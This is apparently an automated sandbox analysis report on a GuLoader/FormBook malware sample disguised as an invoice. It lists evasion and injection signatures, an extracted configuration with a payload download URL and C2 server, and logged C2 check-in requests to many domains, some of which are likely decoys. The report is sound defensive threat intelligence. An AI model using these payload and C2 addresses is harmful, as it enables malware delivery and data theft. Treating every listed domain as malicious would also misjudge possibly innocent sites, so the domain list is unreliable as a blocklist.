Windows Analysis Report draft_inv dec21.exe

Overview

General Information

Sample Name: draft_inv dec21.exe
Analysis ID: 531747
MD5: 89a584acaeb2f9e8baf46714eb7d3550
SHA1: 263ff0b238d57cfc30492f8801530b9986dcae38
SHA256: 59ae017767f6a56eba79abdad1343cba3643744f4668b320c30fda283abdedf2

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
Source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin"}
Multi AV Scanner detection for submitted file
Source: draft_inv dec21.exe Virustotal: Detection: 26%
Source: draft_inv dec21.exe Metadefender: Detection: 20%
Source: draft_inv dec21.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c Avira URL Cloud: Label: phishing
Source: http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN Avira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe Metadefender: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe ReversingLabs: Detection: 17%
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.svchost.exe.405796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 11.2.svchost.exe.3418000.1.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: draft_inv dec21.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe Network Connect: 35.244.144.199 80
Source: C:\Windows\explorer.exe Network Connect: 216.250.120.206 80
Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Network Connect: 185.98.5.234 80
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe Network Connect: 50.118.200.120 80
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.57 80
Source: C:\Windows\explorer.exe Network Connect: 154.23.172.127 80
Source: C:\Windows\explorer.exe Network Connect: 34.237.47.210 80
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe Network Connect: 66.29.140.185 80
Source: C:\Windows\explorer.exe Network Connect: 185.61.153.97 80
Source: C:\Windows\explorer.exe Network Connect: 81.2.194.128 80
Source: C:\Windows\explorer.exe Network Connect: 203.170.80.250 80
Source: C:\Windows\explorer.exe Network Connect: 164.155.212.139 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 104.21.82.227 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.receiptpor.xyz
Source: DNS query: www.dif-directory.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.gdav130.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.ozattaos.xyz
Source: DNS query: www.smartam6.xyz
Source: DNS query: www.yghdlhax.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: Malware configuration extractor URLs: www.ayudavida.com/n8ds/
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.smartam6.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.yghdlhax.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.talkingpoint.tours replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.cmoigus.net replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.csenmoga.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.jobl.space replaycode: Name error (3)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 36
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
